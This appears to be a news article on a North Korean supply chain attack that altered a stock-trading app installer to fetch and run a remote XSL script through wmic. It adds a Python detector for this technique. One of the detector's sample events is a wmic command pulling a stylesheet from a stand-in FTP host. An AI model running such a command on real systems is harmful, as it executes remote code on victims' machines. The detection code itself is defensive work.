North Korean software supply chain attack targets stock investors
2021-01-05 11:55

North Korean hacking group Thallium has targeted users of a private stock investment messenger service in a software supply chain attack, according to a report published this week.

Attackers alter the installer of a stock investment app.

The attackers injected commands into the legitimate installer of the stock investment platform. These commands fetched a malicious XSL script from a rogue FTP server and executed it on Windows systems using the built-in wmic utility.
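Detection logic for the behaviour described above, added here as an example and not taken from the ESTsecurity report or the original article: it flags process-creation events in which wmic is handed a stylesheet from a remote location (FTP, HTTP(S) or a UNC share) or from a local .xsl file. The event field names, the sample events and the host `files.example.invalid` are constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any platform

# Value of wmic's /format switch, quoted or bare.
FORMAT_RE = re.compile(r'/format\s*:\s*(?:"([^"]*)"|(\S+))', re.IGNORECASE)
# Stylesheet fetched over the network: URL scheme or UNC share.
REMOTE_RE = re.compile(r'^(?:ftp|https?)://|^\\\\', re.IGNORECASE)

def classify_stylesheet(command_line):
    """Return 'remote', 'local-file' or None for a wmic command line."""
    m = FORMAT_RE.search(command_line)
    if not m:
        return None
    value = (m.group(1) or m.group(2) or "").strip()
    if REMOTE_RE.match(value):
        return "remote"
    if value.lower().endswith(".xsl") or "\\" in value or "/" in value:
        return "local-file"
    return None  # plain keyword format such as list or csv

def detect(events):
    """Yield (event id, stylesheet kind, parent image name) for suspicious wmic runs."""
    hits = []
    for ev in events:
        if basename(ev["image"]).lower() != "wmic.exe":
            continue
        kind = classify_stylesheet(ev["command_line"])
        if kind:
            hits.append((ev["id"], kind, basename(ev["parent"]).lower()))
    return hits

WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
# Constructed process-creation events (fields modelled loosely on EDR/Sysmon output).
SAMPLE_EVENTS = [
    {"id": 1, "image": WMIC, "parent": r"C:\Windows\System32\cmd.exe",
     "command_line": "wmic os get caption /format:list"},
    {"id": 2, "image": WMIC, "parent": r"C:\Users\user\Downloads\setup.exe",
     "command_line": 'wmic os get /format:"ftp://files.example.invalid/style.xsl"'},
    {"id": 3, "image": WMIC, "parent": r"C:\Program Files\Microsoft Office\EXCEL.EXE",
     "command_line": r"wmic os get /FORMAT:C:\Users\Public\report.xsl"},
    {"id": 4, "image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "command_line": r"notepad.exe C:\notes\format.xsl"},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Remote stylesheets are the higher-confidence signal; local .xsl hits are worth triaging by parent process, since an installer or Office application launching wmic is unusual.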

Excel macros also used to deliver the payload.

ESTsecurity researchers also observed Microsoft Office documents, such as Excel spreadsheets containing macros, distributing the aforementioned XSL script payload. "ESRC is paying attention to the fact that the Thallium organization is using the 'XSL Script Processing' technique not only in spear phishing attacks based on malicious documents, but also for niche attacks including supply chain attacks," stated ESTsecurity researchers in their translated report.

Whether the goal behind this attack was monetary gain or espionage on traders, supply chain attacks have become a common nuisance of these times.

Last month, attackers targeted the open-source ecosystem RubyGems in a software supply chain attack to steal cryptocurrency from infected machines.


News URL

https://www.bleepingcomputer.com/news/security/north-korean-software-supply-chain-attack-targets-stock-investors/